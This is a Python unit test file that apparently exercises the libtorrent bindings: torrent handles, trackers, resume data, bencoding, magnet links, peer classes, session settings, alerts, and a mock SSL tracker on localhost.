self.h.move_storage(u'test-dir')
self.h.move_storage(b'test-dir2')
self.h.move_storage('test-dir3')
self.h.move_storage(u'test-dir', flags=lt.move_flags_t.dont_replace)
self.h.move_storage(u'test-dir', flags=2)
self.h.move_storage(b'test-dir2', flags=2)
self.h.move_storage('test-dir3', flags=2)
def test_torrent_handle(self):
self.setup()
self.assertEqual(self.h.get_file_priorities(), [4, 4])
self.assertEqual(self.h.get_piece_priorities(), [4])
self.h.prioritize_files([0, 1])
# workaround for asynchronous priority update
time.sleep(1)
self.assertEqual(self.h.get_file_priorities(), [0, 1])
self.h.prioritize_pieces([0])
self.assertEqual(self.h.get_piece_priorities(), [0])
# also test the overload that takes a list of piece->priority mappings
self.h.prioritize_pieces([(0, 1)])
self.assertEqual(self.h.get_piece_priorities(), [1])
self.h.connect_peer(('127.0.0.1', 6881))
self.h.connect_peer(('127.0.0.2', 6881), source=4)
self.h.connect_peer(('127.0.0.3', 6881), flags=2)
self.h.connect_peer(('127.0.0.4', 6881), flags=2, source=4)
torrent_files = self.h.torrent_file()
print(torrent_files.map_file(0, 0, 0).piece)
print(self.h.queue_position())
def test_torrent_handle_in_set(self):
self.setup()
torrents = set()
torrents.add(self.h)
# get another instance of a torrent_handle that represents the same
# torrent. Make sure that when we add it to a set, it just replaces the
# existing object
t = self.ses.get_torrents()
self.assertEqual(len(t), 1)
for h in t:
torrents.add(h)
self.assertEqual(len(torrents), 1)
def test_torrent_handle_in_dict(self):
self.setup()
torrents = {}
torrents[self.h] = 'foo'
# get another instance of a torrent_handle that represents the same
# torrent. Make sure that when we add it to a dict, it just replaces the
# existing object
t = self.ses.get_torrents()
self.assertEqual(len(t), 1)
for h in t:
torrents[h] = 'bar'
self.assertEqual(len(torrents), 1)
self.assertEqual(torrents[self.h], 'bar')
def test_replace_trackers(self):
self.setup()
trackers = []
for idx, tracker_url in enumerate(('udp://tracker1.com', 'udp://tracker2.com')):
tracker = lt.announce_entry(tracker_url)
tracker.tier = idx
tracker.fail_limit = 2
trackers.append(tracker)
self.assertEqual(tracker.url, tracker_url)
self.h.replace_trackers(trackers)
new_trackers = self.h.trackers()
self.assertEqual(new_trackers[0]['url'], 'udp://tracker1.com')
self.assertEqual(new_trackers[1]['tier'], 1)
self.assertEqual(new_trackers[1]['fail_limit'], 2)
def test_pickle_trackers(self):
"""Test lt objects convertors are working and trackers can be pickled"""
self.setup()
tracker = lt.announce_entry('udp://tracker1.com')
tracker.tier = 0
tracker.fail_limit = 1
trackers = [tracker]
self.h.replace_trackers(trackers)
# wait a bit until the endpoints list gets populated
while len(self.h.trackers()[0]['endpoints']) == 0:
time.sleep(0.1)
trackers = self.h.trackers()
self.assertEqual(trackers[0]['url'], 'udp://tracker1.com')
# this is not necessarily 0, it could also be (EHOSTUNREACH) if the
# local machine doesn't support the address family
expect_value = trackers[0]['endpoints'][0]['last_error']['value']
pickled_trackers = pickle.dumps(trackers)
unpickled_trackers = pickle.loads(pickled_trackers)
self.assertEqual(unpickled_trackers[0]['url'], 'udp://tracker1.com')
self.assertEqual(unpickled_trackers[0]['endpoints'][0]['last_error']['value'], expect_value)
def test_file_status(self):
self.setup()
status = self.h.file_status()
print(status)
def test_piece_deadlines(self):
self.setup()
self.h.clear_piece_deadlines()
def test_status_last_uploaded_dowloaded(self):
# we want to check at seconds precision but can't control session
# time, wait for next full second to prevent second increment
time.sleep(1 - datetime.datetime.now().microsecond / 1000000.0)
self.setup()
st = self.h.status()
for attr in dir(st):
print('%s: %s' % (attr, getattr(st, attr)))
# last upload and download times are at session start time
self.assertEqual(st.last_upload, None)
self.assertEqual(st.last_download, None)
def test_serialize_trackers(self):
"""Test to ensure the dict contains only python built-in types"""
self.setup()
self.h.add_tracker({'url': 'udp://tracker1.com'})
tr = self.h.trackers()[0]
# wait a bit until the endpoints list gets populated
while len(tr['endpoints']) == 0:
time.sleep(0.1)
tr = self.h.trackers()[0]
import json
print(json.dumps(self.h.trackers()[0]))
def test_torrent_status(self):
self.setup()
st = self.h.status()
ti = st.handle
self.assertEqual(ti.info_hash(), self.ti.info_hash())
# make sure we can compare torrent_status objects
st2 = self.h.status()
self.assertEqual(st2, st)
print(st2)
def test_read_resume_data(self):
resume_data = lt.bencode({
'file-format': 'libtorrent resume file',
'info-hash': 'abababababababababab',
'name': 'test',
'save_path': '.',
'peers': '\x01\x01\x01\x01\x00\x01\x02\x02\x02\x02\x00\x02',
'file_priority': [0, 1, 1]})
tp = lt.read_resume_data(resume_data)
self.assertEqual(tp.name, 'test')
self.assertEqual(tp.info_hash, lt.sha1_hash('abababababababababab'))
self.assertEqual(tp.file_priorities, [0, 1, 1])
self.assertEqual(tp.peers, [('1.1.1.1', 1), ('2.2.2.2', 2)])
ses = lt.session(settings)
h = ses.add_torrent(tp)
for attr in dir(tp):
print('%s: %s' % (attr, getattr(tp, attr)))
h.connect_peer(('3.3.3.3', 3))
for i in range(0, 10):
alerts = ses.pop_alerts()
for a in alerts:
print(a.message())
time.sleep(0.1)
def test_scrape(self):
self.setup()
# this is just to make sure this function can be called like this
# from python
self.h.scrape_tracker()
def test_unknown_torrent_parameter(self):
self.ses = lt.session(settings)
try:
self.h = self.ses.add_torrent({'unexpected-key-name': ''})
self.assertFalse('should have thrown an exception')
except KeyError as e:
print(e)
def test_torrent_parameter(self):
self.ses = lt.session(settings)
self.ti = lt.torrent_info('url_seed_multi.torrent')
self.h = self.ses.add_torrent({
'ti': self.ti,
'save_path': os.getcwd(),
'trackers': ['http://test.com/announce'],
'dht_nodes': [('1.2.3.4', 6881), ('4.3.2.1', 6881)],
'file_priorities': [1, 1],
'http_seeds': ['http://test.com/file3'],
'url_seeds': ['http://test.com/announce-url'],
'peers': [('5.6.7.8', 6881)],
'banned_peers': [('8.7.6.5', 6881)],
'renamed_files': {0: 'test.txt', 2: 'test.txt'}
})
self.st = self.h.status()
self.assertEqual(self.st.save_path, os.getcwd())
trackers = self.h.trackers()
self.assertEqual(len(trackers), 1)
self.assertEqual(trackers[0].get('url'), 'http://test.com/announce')
self.assertEqual(trackers[0].get('tier'), 0)
self.assertEqual(self.h.get_file_priorities(), [1, 1])
self.assertEqual(self.h.http_seeds(), ['http://test.com/file3'])
# url_seeds was already set, test that it did not get overwritten
self.assertEqual(self.h.url_seeds(),
['http://test.com/announce-url/', 'http://test.com/file/'])
# piece priorities weren't set explicitly, but they were updated by the
# file priorities being set
self.assertEqual(self.h.get_piece_priorities(), [1])
self.assertEqual(self.ti.merkle_tree(), [])
self.assertEqual(self.st.verified_pieces, [])
class TestAddPiece(unittest.TestCase):
def setUp(self):
self.dir = tempfile.TemporaryDirectory()
self.session = lt.session(settings)
self.ti = lt.torrent_info(dummy_data.DICT)
self.atp = lt.add_torrent_params()
self.atp.ti = self.ti
self.atp.save_path = self.dir.name
self.handle = self.session.add_torrent(self.atp)
self.wait_for(lambda: self.handle.status().state != lt.torrent_status.checking_files
and self.handle.status().state != lt.torrent_status.checking_resume_data, msg="checking")
def wait_for(self, condition, msg="condition", timeout=5):
deadline = time.time() + timeout
while not condition():
self.assertLess(time.time(), deadline, msg="%s timed out" % msg)
time.sleep(0.1)
def wait_until_torrent_finished(self):
self.wait_for(lambda: self.handle.status().progress == 1.0, msg="progress")
def file_written():
with open(os.path.join(self.dir.name.encode(), dummy_data.NAME), mode="rb") as f:
return f.read() == dummy_data.DATA
self.wait_for(file_written, msg="file write")
def test_with_str(self):
for i, data in enumerate(dummy_data.PIECES):
self.handle.add_piece(i, data.decode(), 0)
self.wait_until_torrent_finished()
def test_with_bytes(self):
for i, data in enumerate(dummy_data.PIECES):
self.handle.add_piece(i, data, 0)
self.wait_until_torrent_finished()
class test_torrent_info(unittest.TestCase):
def test_bencoded_constructor(self):
# things that can be converted to a bencoded entry, will be interpreted
# as such and encoded
info = lt.torrent_info({'info': {
'name': 'test_torrent', 'length': 1234,
'piece length': 16 * 1024,
'pieces': 'aaaaaaaaaaaaaaaaaaaa'}})
self.assertEqual(info.num_files(), 1)
f = info.files()
self.assertEqual(f.file_path(0), 'test_torrent')
self.assertEqual(f.file_name(0), 'test_torrent')
self.assertEqual(f.file_size(0), 1234)
self.assertEqual(info.total_size(), 1234)
self.assertEqual(info.creation_date(), 0)
def test_bytearray(self):
# a bytearray object is interpreted as a bencoded buffer
info = lt.torrent_info(bytearray(lt.bencode({'info': {
'name': 'test_torrent', 'length': 1234,
'piece length': 16 * 1024,
'pieces': 'aaaaaaaaaaaaaaaaaaaa'}})))
self.assertEqual(info.num_files(), 1)
def test_bytes(self):
# a bytes object is interpreted as a bencoded buffer
info = lt.torrent_info(bytes(lt.bencode({'info': {
'name': 'test_torrent', 'length': 1234,
'piece length': 16 * 1024,
'pieces': 'aaaaaaaaaaaaaaaaaaaa'}})))
self.assertEqual(info.num_files(), 1)
def test_load_decode_depth_limit(self):
self.assertRaises(RuntimeError, lambda: lt.torrent_info(
{'test': {'test': {'test': {'test': {'test': {}}}}}, 'info': {
'name': 'test_torrent', 'length': 1234,
'piece length': 16 * 1024,
'pieces': 'aaaaaaaaaaaaaaaaaaaa'}}, {'max_decode_depth': 1}))
def test_load_max_pieces_limit(self):
self.assertRaises(RuntimeError, lambda: lt.torrent_info(
{'info': {
'name': 'test_torrent', 'length': 1234000,
'piece length': 16 * 1024,
'pieces': 'aaaaaaaaaaaaaaaaaaaa'}}, {'max_pieces': 1}))
def test_load_max_buffer_size_limit(self):
self.assertRaises(RuntimeError, lambda: lt.torrent_info(
{'info': {
'name': 'test_torrent', 'length': 1234000,
'piece length': 16 * 1024,
'pieces': 'aaaaaaaaaaaaaaaaaaaa'}}, {'max_buffer_size': 1}))
def test_metadata(self):
ti = lt.torrent_info('base.torrent')
self.assertTrue(len(ti.metadata()) != 0)
self.assertTrue(len(ti.hash_for_piece(0)) != 0)
def test_torrent_info_bytes_overload(self):
# bytes will never be interpreted as a file name. It's interpreted as a
# bencoded buffer
with self.assertRaises(RuntimeError):
ti = lt.torrent_info(b'base.torrent')
def test_web_seeds(self):
ti = lt.torrent_info('base.torrent')
ws = [{'url': 'http://foo/test', 'auth': '', 'type': 0},
{'url': 'http://bar/test', 'auth': '', 'type': 1}]
ti.set_web_seeds(ws)
web_seeds = ti.web_seeds()
self.assertEqual(len(ws), len(web_seeds))
for i in range(len(web_seeds)):
self.assertEqual(web_seeds[i]["url"], ws[i]["url"])
self.assertEqual(web_seeds[i]["auth"], ws[i]["auth"])
self.assertEqual(web_seeds[i]["type"], ws[i]["type"])
def test_announce_entry(self):
ae = lt.announce_entry('test')
self.assertEqual(ae.url, 'test')
self.assertEqual(ae.tier, 0)
self.assertEqual(ae.verified, False)
self.assertEqual(ae.source, 0)
def test_torrent_info_sha1_hash_overload(self):
ti = lt.torrent_info(lt.sha1_hash('a' * 20))
self.assertEqual(ti.info_hash(), lt.sha1_hash('a' * 20))
ti_copy = lt.torrent_info(ti)
self.assertEqual(ti_copy.info_hash(), lt.sha1_hash('a' * 20))
def test_url_seed(self):
ti = lt.torrent_info('base.torrent')
ti.add_tracker('foobar1')
ti.add_url_seed('foobar2')
ti.add_url_seed('foobar3', 'username:password')
ti.add_url_seed('foobar4', 'username:password', [])
seeds = ti.web_seeds()
self.assertEqual(seeds, [
{'url': 'foobar2', 'type': 0, 'auth': ''},
{'url': 'foobar3', 'type': 0, 'auth': 'username:password'},
{'url': 'foobar4', 'type': 0, 'auth': 'username:password'},
])
def test_http_seed(self):
ti = lt.torrent_info('base.torrent')
ti.add_http_seed('foobar2')
ti.add_http_seed('foobar3', 'username:password')
ti.add_http_seed('foobar4', 'username:password', [])
seeds = ti.web_seeds()
self.assertEqual(seeds, [
{'url': 'foobar2', 'type': 1, 'auth': ''},
{'url': 'foobar3', 'type': 1, 'auth': 'username:password'},
{'url': 'foobar4', 'type': 1, 'auth': 'username:password'},
])
class test_alerts(unittest.TestCase):
def test_alert(self):
ses = lt.session(settings)
ti = lt.torrent_info('base.torrent')
h = ses.add_torrent({'ti': ti, 'save_path': os.getcwd()})
st = h.status()
time.sleep(1)
ses.remove_torrent(h)
ses.wait_for_alert(1000) # milliseconds
alerts = ses.pop_alerts()
for a in alerts:
if a.what() == 'add_torrent_alert':
self.assertEqual(a.torrent_name, 'temp')
print(a.message())
for field_name in dir(a):
if field_name.startswith('__'):
continue
field = getattr(a, field_name)
if callable(field):
print(' ', field_name, ' = ', field())
else:
print(' ', field_name, ' = ', field)
print(st.next_announce)
self.assertEqual(st.name, 'temp')
print(st.errc.message())
print(st.pieces)
print(st.last_seen_complete)
print(st.completed_time)
print(st.progress)
print(st.num_pieces)
print(st.distributed_copies)
print(st.info_hash)
print(st.seeding_duration)
print(st.last_upload)
print(st.last_download)
self.assertEqual(st.save_path, os.getcwd())
def test_alert_fs(self):
ses = lt.session(settings)
s1, s2 = socket.socketpair()
ses.set_alert_fd(s2.fileno())
ses.pop_alerts()
# make sure there's an alert to wake us up
ses.post_session_stats()
read_sockets, write_sockets, error_sockets = select.select([s1], [], [])
self.assertEqual(len(read_sockets), 1)
for s in read_sockets:
s.recv(10)
def test_pop_alerts(self):
ses = lt.session(settings)
ses.async_add_torrent(
{"ti": lt.torrent_info("base.torrent"), "save_path": "."})
# this will cause an error (because of duplicate torrents) and the
# torrent_info object created here will be deleted once the alert goes out
# of scope. When that happens, it will decrement the python object, to allow
# it to release the object.
# we're trying to catch the error described in this post, with regards to
# torrent_info.
# https://mail.python.org/pipermail/cplusplus-sig/2007-June/012130.html
ses.async_add_torrent(
{"ti": lt.torrent_info("base.torrent"), "save_path": "."})
time.sleep(1)
for i in range(0, 10):
alerts = ses.pop_alerts()
for a in alerts:
print(a.message())
time.sleep(0.1)
def test_alert_notify(self):
ses = lt.session(settings)
event = threading.Event()
def callback():
event.set()
ses.set_alert_notify(callback)
ses.async_add_torrent(
{"ti": lt.torrent_info("base.torrent"), "save_path": "."})
event.wait()
class test_bencoder(unittest.TestCase):
def test_bencode(self):
encoded = lt.bencode({'a': 1, 'b': [1, 2, 3], 'c': 'foo'})
self.assertEqual(encoded, b'd1:ai1e1:bli1ei2ei3ee1:c3:fooe')
def test_bdecode(self):
encoded = b'd1:ai1e1:bli1ei2ei3ee1:c3:fooe'
decoded = lt.bdecode(encoded)
self.assertEqual(decoded, {b'a': 1, b'b': [1, 2, 3], b'c': b'foo'})
def test_string(self):
encoded = lt.bencode('foo\u00e5\u00e4\u00f6')
self.assertEqual(encoded, b'9:foo\xc3\xa5\xc3\xa4\xc3\xb6')
def test_bytes(self):
encoded = lt.bencode(b'foo')
self.assertEqual(encoded, b'3:foo')
def test_float(self):
# TODO: this should throw a TypeError in the future
with self.assertWarns(DeprecationWarning):
encoded = lt.bencode(1.337)
self.assertEqual(encoded, b'0:')
def test_object(self):
class FooBar:
dummy = 1
# TODO: this should throw a TypeError in the future
with self.assertWarns(DeprecationWarning):
encoded = lt.bencode(FooBar())
self.assertEqual(encoded, b'0:')
def test_preformatted(self):
encoded = lt.bencode((1, 2, 3, 4, 5))
self.assertEqual(encoded, b'\x01\x02\x03\x04\x05')
class test_sha1hash(unittest.TestCase):
def test_sha1hash(self):
h = 'a0' * 20
s = lt.sha1_hash(binascii.unhexlify(h))
self.assertEqual(h, str(s))
class test_magnet_link(unittest.TestCase):
def test_parse_magnet_uri(self):
ses = lt.session({})
magnet = 'magnet:?xt=urn:btih:C6EIF4CCYDBTIJVG3APAGM7M4NDONCTI'
p = lt.parse_magnet_uri(magnet)
self.assertEqual(str(p.info_hash), '178882f042c0c33426a6d81e0333ece346e68a68')
p.save_path = '.'
h = ses.add_torrent(p)
self.assertEqual(str(h.info_hash()), '178882f042c0c33426a6d81e0333ece346e68a68')
def test_parse_magnet_uri_dict(self):
ses = lt.session({})
magnet = 'magnet:?xt=urn:btih:C6EIF4CCYDBTIJVG3APAGM7M4NDONCTI'
p = lt.parse_magnet_uri_dict(magnet)
self.assertEqual(binascii.hexlify(p['info_hash']), b'178882f042c0c33426a6d81e0333ece346e68a68')
p['save_path'] = '.'
h = ses.add_torrent(p)
self.assertEqual(str(h.info_hash()), '178882f042c0c33426a6d81e0333ece346e68a68')
class test_peer_class(unittest.TestCase):
def test_peer_class_ids(self):
s = lt.session(settings)
print('global_peer_class_id:', lt.session.global_peer_class_id)
print('tcp_peer_class_id:', lt.session.tcp_peer_class_id)
print('local_peer_class_id:', lt.session.local_peer_class_id)
print('global: ', s.get_peer_class(s.global_peer_class_id))
print('tcp: ', s.get_peer_class(s.local_peer_class_id))
print('local: ', s.get_peer_class(s.local_peer_class_id))
def test_peer_class(self):
s = lt.session(settings)
c = s.create_peer_class('test class')
print('new class: ', s.get_peer_class(c))
nfo = s.get_peer_class(c)
self.assertEqual(nfo['download_limit'], 0)
self.assertEqual(nfo['upload_limit'], 0)
self.assertEqual(nfo['ignore_unchoke_slots'], False)
self.assertEqual(nfo['connection_limit_factor'], 100)
self.assertEqual(nfo['download_priority'], 1)
self.assertEqual(nfo['upload_priority'], 1)
self.assertEqual(nfo['label'], 'test class')
nfo['download_limit'] = 1337
nfo['upload_limit'] = 1338
nfo['ignore_unchoke_slots'] = True
nfo['connection_limit_factor'] = 42
nfo['download_priority'] = 2
nfo['upload_priority'] = 3
s.set_peer_class(c, nfo)
nfo2 = s.get_peer_class(c)
self.assertEqual(nfo, nfo2)
def test_peer_class_filter(self):
filt = lt.peer_class_type_filter()
filt.add(lt.peer_class_type_filter.tcp_socket, lt.session.global_peer_class_id)
filt.remove(lt.peer_class_type_filter.utp_socket, lt.session.local_peer_class_id)
filt.disallow(lt.peer_class_type_filter.tcp_socket, lt.session.global_peer_class_id)
filt.allow(lt.peer_class_type_filter.utp_socket, lt.session.local_peer_class_id)
def test_peer_class_ip_filter(self):
s = lt.session(settings)
s.set_peer_class_type_filter(lt.peer_class_type_filter())
s.set_peer_class_filter(lt.ip_filter())
class test_ip_filter(unittest.TestCase):
def test_export(self):
f = lt.ip_filter()
self.assertEqual(f.access('1.1.1.1'), 0)
f.add_rule('1.1.1.1', '1.1.1.2', 1)
self.assertEqual(f.access('1.1.1.0'), 0)
self.assertEqual(f.access('1.1.1.1'), 1)
self.assertEqual(f.access('1.1.1.2'), 1)
self.assertEqual(f.access('1.1.1.3'), 0)
exp = f.export_filter()
self.assertEqual(exp, ([('0.0.0.0', '1.1.1.0'), ('1.1.1.1', '1.1.1.2'), ('1.1.1.3', '255.255.255.255')], [('::', 'ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff')]))
class test_session(unittest.TestCase):
def test_settings(self):
sett = { 'alert_mask': lt.alert.category_t.all_categories }
s = lt.session(sett)
sett = s.get_settings()
self.assertEqual(sett['alert_mask'] & 0x7fffffff, 0x7fffffff)
def test_add_torrent(self):
s = lt.session(settings)
s.add_torrent({'ti': lt.torrent_info('base.torrent'),
'save_path': '.',
'dht_nodes': [('1.2.3.4', 6881), ('4.3.2.1', 6881)],
'http_seeds': ['http://test.com/seed'],
'peers': [('5.6.7.8', 6881)],
'banned_peers': [('8.7.6.5', 6881)],
'file_priorities': [1, 1, 1, 2, 0]})
def test_session_status(self):
if not has_deprecated():
return
s = lt.session()
st = s.status()
print(st)
print(st.active_requests)
print(st.dht_nodes)
print(st.dht_node_cache)
print(st.dht_torrents)
print(st.dht_global_nodes)
print(st.dht_total_allocations)
def test_apply_settings(self):
s = lt.session(settings)
s.apply_settings({'num_want': 66, 'user_agent': 'test123'})
self.assertEqual(s.get_settings()['num_want'], 66)
self.assertEqual(s.get_settings()['user_agent'], 'test123')
def test_post_session_stats(self):
s = lt.session({'alert_mask': lt.alert.category_t.stats_notification,
'enable_dht': False})
s.post_session_stats()
alerts = []
# first the stats headers log line. but not if logging is disabled
while len(alerts) == 0:
s.wait_for_alert(1000)
alerts = s.pop_alerts()
while len(alerts) > 0:
a = alerts.pop(0)
print(a)
if isinstance(a, lt.session_stats_header_alert):
break
self.assertTrue(isinstance(a, lt.session_stats_header_alert))
# then the actual stats values
while len(alerts) == 0:
s.wait_for_alert(1000)
alerts = s.pop_alerts()
a = alerts.pop(0)
print(a)
self.assertTrue(isinstance(a, lt.session_stats_alert))
self.assertTrue(isinstance(a.values, dict))
self.assertTrue(len(a.values) > 0)
def test_post_dht_stats(self):
s = lt.session({'alert_mask': lt.alert.category_t.stats_notification, 'enable_dht': False})
s.post_dht_stats()
alerts = []
# first the stats headers log line. but not if logging is disabled
while len(alerts) == 0:
s.wait_for_alert(1000)
alerts = s.pop_alerts()
a = alerts.pop(0)
self.assertTrue(isinstance(a, lt.dht_stats_alert))
self.assertTrue(isinstance(a.active_requests, list))
self.assertTrue(isinstance(a.routing_table, list))
def test_unknown_settings(self):
try:
lt.session({'unexpected-key-name': 42})
self.assertFalse('should have thrown an exception')
except KeyError as e:
print(e)
def test_fingerprint(self):
self.assertEqual(lt.generate_fingerprint('LT', 0, 1, 2, 3), '-LT0123-')
self.assertEqual(lt.generate_fingerprint('..', 10, 1, 2, 3), '-..A123-')
def test_min_memory_preset(self):
min_mem = lt.min_memory_usage()
print(min_mem)
self.assertTrue('connection_speed' in min_mem)
self.assertTrue('file_pool_size' in min_mem)
def test_seed_mode_preset(self):
seed_mode = lt.high_performance_seed()
print(seed_mode)
self.assertTrue('alert_queue_size' in seed_mode)
self.assertTrue('connection_speed' in seed_mode)
self.assertTrue('file_pool_size' in seed_mode)
def test_default_settings(self):
default = lt.default_settings()
print(default)
class test_example_client(unittest.TestCase):
def test_execute_client(self):
if os.name == 'nt':
# TODO: fix windows includes of client.py
return
my_stdin = sys.stdin
if os.name != 'nt':
master_fd, slave_fd = pty.openpty()
# slave_fd fix multiple stdin assignment at termios.tcgetattr
my_stdin = slave_fd
process = sub.Popen(
[sys.executable, "client.py", "url_seed_multi.torrent"],
stdin=my_stdin, stdout=sub.PIPE, stderr=sub.PIPE)
# python2 has no Popen.wait() timeout
time.sleep(5)
returncode = process.poll()
if returncode is None:
# this is an expected use-case
process.kill()
err = process.stderr.read().decode("utf-8")
self.assertEqual('', err, 'process throw errors: \n' + err)
# check error code if process did unexpected end
if returncode is not None:
# in case of error return: output stdout if nothing was on stderr
if returncode != 0:
print("stdout:\n" + process.stdout.read().decode("utf-8"))
self.assertEqual(returncode, 0, "returncode: " + str(returncode) + "\n"
+ "stderr: empty\n"
+ "some configuration does not output errors like missing module members,"
+ "try to call it manually to get the error message\n")
def test_execute_simple_client(self):
process = sub.Popen(
[sys.executable, "simple_client.py", "url_seed_multi.torrent"],
stdout=sub.PIPE, stderr=sub.PIPE)
# python2 has no Popen.wait() timeout
time.sleep(5)
returncode = process.poll()
if returncode is None:
# this is an expected use-case
process.kill()
err = process.stderr.read().decode("utf-8")
self.assertEqual('', err, 'process throw errors: \n' + err)
# check error code if process did unexpected end
if returncode is not None:
# in case of error return: output stdout if nothing was on stderr
if returncode != 0:
print("stdout:\n" + process.stdout.read().decode("utf-8"))
self.assertEqual(returncode, 0, "returncode: " + str(returncode) + "\n"
+ "stderr: empty\n"
+ "some configuration does not output errors like missing module members,"
+ "try to call it manually to get the error message\n")
def test_execute_make_torrent(self):
process = sub.Popen(
[sys.executable, "make_torrent.py", "url_seed_multi.torrent",
"http://test.com/test"], stdout=sub.PIPE, stderr=sub.PIPE)
returncode = process.wait()
# python2 has no Popen.wait() timeout
err = process.stderr.read().decode("utf-8")
self.assertEqual('', err, 'process throw errors: \n' + err)
# in case of error return: output stdout if nothing was on stderr
if returncode != 0:
print("stdout:\n" + process.stdout.read().decode("utf-8"))
self.assertEqual(returncode, 0, "returncode: " + str(returncode) + "\n"
+ "stderr: empty\n"
+ "some configuration does not output errors like missing module members,"
+ "try to call it manually to get the error message\n")
def test_default_settings(self):
default = lt.default_settings()
self.assertNotIn('', default)
print(default)
class test_operation_t(unittest.TestCase):
def test_enum(self):
self.assertEqual(lt.operation_name(lt.operation_t.sock_accept), "sock_accept")
self.assertEqual(lt.operation_name(lt.operation_t.unknown), "unknown")
self.assertEqual(lt.operation_name(lt.operation_t.mkdir), "mkdir")
self.assertEqual(lt.operation_name(lt.operation_t.partfile_write), "partfile_write")
self.assertEqual(lt.operation_name(lt.operation_t.hostname_lookup), "hostname_lookup")
class test_error_code(unittest.TestCase):
def test_error_code(self):
a = lt.error_code()
a = lt.error_code(10, lt.libtorrent_category())
self.assertEqual(a.category().name(), 'libtorrent')
self.assertEqual(lt.libtorrent_category().name(), 'libtorrent')
self.assertEqual(lt.upnp_category().name(), 'upnp')
self.assertEqual(lt.http_category().name(), 'http')
self.assertEqual(lt.socks_category().name(), 'socks')
self.assertEqual(lt.bdecode_category().name(), 'bdecode')
self.assertEqual(lt.generic_category().name(), 'generic')
self.assertEqual(lt.system_category().name(), 'system')
class test_peer_info(unittest.TestCase):
def test_peer_info_members(self):
p = lt.peer_info()
print(p.client)
print(p.pieces)
print(p.pieces)
print(p.last_request)
print(p.last_active)
print(p.flags)
print(p.source)
print(p.pid)
print(p.downloading_piece_index)
print(p.ip)
print(p.local_endpoint)
print(p.read_state)
print(p.write_state)
class test_dht_settings(unittest.TestCase):
def test_construct(self):
ds = lt.dht_settings()
print(ds.max_peers_reply)
print(ds.search_branching)
print(ds.max_fail_count)
print(ds.max_fail_count)
print(ds.max_torrents)
print(ds.max_dht_items)
print(ds.restrict_routing_ips)
print(ds.restrict_search_ips)
print(ds.max_torrent_search_reply)
print(ds.extended_routing_table)
print(ds.aggressive_lookups)
print(ds.privacy_lookups)
print(ds.enforce_node_id)
print(ds.ignore_dark_internet)
print(ds.block_timeout)
print(ds.block_ratelimit)
print(ds.read_only)
print(ds.item_lifetime)
def get_isolated_settings():
return {
"enable_dht": False,
"enable_lsd": False,
"enable_natpmp": False,
"enable_upnp": False,
"listen_interfaces": "127.0.0.1:0",
"dht_bootstrap_nodes": "",
}
def loop_until_timeout(timeout, msg="condition"):
deadline = time.monotonic() + timeout
while time.monotonic() < deadline:
yield
raise AssertionError(f"{msg} timed out")
def unlink_all_files(path):
for dirpath, _, filenames in os.walk(path):
for filename in filenames:
filepath = os.path.join(dirpath, filename)
os.unlink(filepath)
# In test cases where libtorrent writes torrent data in a temporary directory,
# cleaning up the tempdir on Windows CI sometimes fails with a PermissionError
# having WinError 5 (Access Denied). I can't repro this WinError in any way;
# holding an open file handle results in a different WinError. Seems to be a
# race condition which only happens with very short-lived tests which write
# data. Work around by cleaning up the tempdir in a loop.
# TODO: why is this necessary?
def cleanup_with_windows_fix(tempdir, *, timeout):
# Clean up just the files, so we don't have to bother with depth-first
# traversal
for _ in loop_until_timeout(timeout, msg="PermissionError clear"):
try:
unlink_all_files(tempdir.name)
except PermissionError:
if sys.platform == "win32":
# current release of mypy doesn't know about winerror
# if exc.winerror == 5:
continue
raise
break
# This removes directories in depth-first traversal.
# It also marks the tempdir as explicitly cleaned so it doesn't trigger a
# ResourceWarning.
tempdir.cleanup()
def wait_for(session, alert_type, *, timeout, prefix=None):
# Return the first alert of type, but log all alerts.
result = None
for _ in loop_until_timeout(timeout, msg=alert_type.__name__):
for alert in session.pop_alerts():
print(f"{alert.what()}: {alert.message()}")
if result is None and isinstance(alert, alert_type):
result = alert
if result is not None:
return result
raise AssertionError("unreachable")
class LambdaRequestHandler(http.server.BaseHTTPRequestHandler):
default_request_version = "HTTP/1.1"
def __init__(self, get_data, *args, **kwargs):
self.get_data = get_data
super().__init__(*args, **kwargs)
def do_GET(self):
print(f"mock tracker request: {self.requestline}")
data = self.get_data()
self.send_response(200)
self.send_header("Content-Type", "application/octet-stream")
self.send_header("Content-Length", str(len(data)))
self.end_headers()
self.wfile.write(data)
class SSLTrackerAlertTest(unittest.TestCase):
def setUp(self):
self.cert_path = os.path.realpath(os.path.join(
os.path.dirname(__file__), "..", "..", "test", "ssl", "server.pem"
))
print(f"cert_path = {self.cert_path}")
self.tracker_response = {
b"external ip": b"\x01\x02\x03\x04",
}
self.tracker = http.server.HTTPServer(
("127.0.0.1", 0),
functools.partial(
LambdaRequestHandler, lambda: lt.bencode(self.tracker_response)
),
)
self.ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.ctx.load_cert_chain(self.cert_path)
self.tracker.socket = self.ctx.wrap_socket(
self.tracker.socket, server_side=True
)
self.tracker_thread = threading.Thread(target=self.tracker.serve_forever)
self.tracker_thread.start()
# HTTPServer.server_name seems to resolve to things like
# "localhost.localdomain"
port = self.tracker.server_port
self.tracker_url = f"https://127.0.0.1:{port}/announce"
print(f"mock tracker url = {self.tracker_url}")
self.settings = get_isolated_settings()
self.settings["alert_mask"] = lt.alert_category.status
# I couldn't get validation to work on all platforms. Setting
# SSL_CERT_FILE to our self-signed cert works on linux and mac, but
# not on Windows.
self.settings["validate_https_trackers"] = False
self.session = lt.session(self.settings)
self.dir = tempfile.TemporaryDirectory()
self.atp = lt.add_torrent_params()
self.atp.info_hash = dummy_data.get_sha1_hash()
self.atp.flags &= ~lt.torrent_flags.auto_managed
self.atp.flags &= ~lt.torrent_flags.paused
self.atp.save_path = self.dir.name
def tearDown(self):
# we do this because sessions writing data can collide with
# cleaning up temporary directories. session.abort() isn't bound
handles = self.session.get_torrents()
for handle in handles:
self.session.remove_torrent(handle)
for _ in loop_until_timeout(5, msg="clear all handles"):
if not any(handle.is_valid() for handle in handles):
break
cleanup_with_windows_fix(self.dir, timeout=5)
self.tracker.shutdown()
# Explicitly clean up server sockets, to avoid ResourceWarning
self.tracker.server_close()
def test_external_ip_alert_via_ssl_tracker(self):
handle = self.session.add_torrent(self.atp)
handle.add_tracker({"url": self.tracker_url})
alert = wait_for(self.session, lt.external_ip_alert, timeout=60)
self.assertEqual(alert.category(), lt.alert_category.status)
self.assertEqual(alert.what(), "external_ip")
self.assertIsInstance(alert.message(), str)
self.assertNotEqual(alert.message(), "")
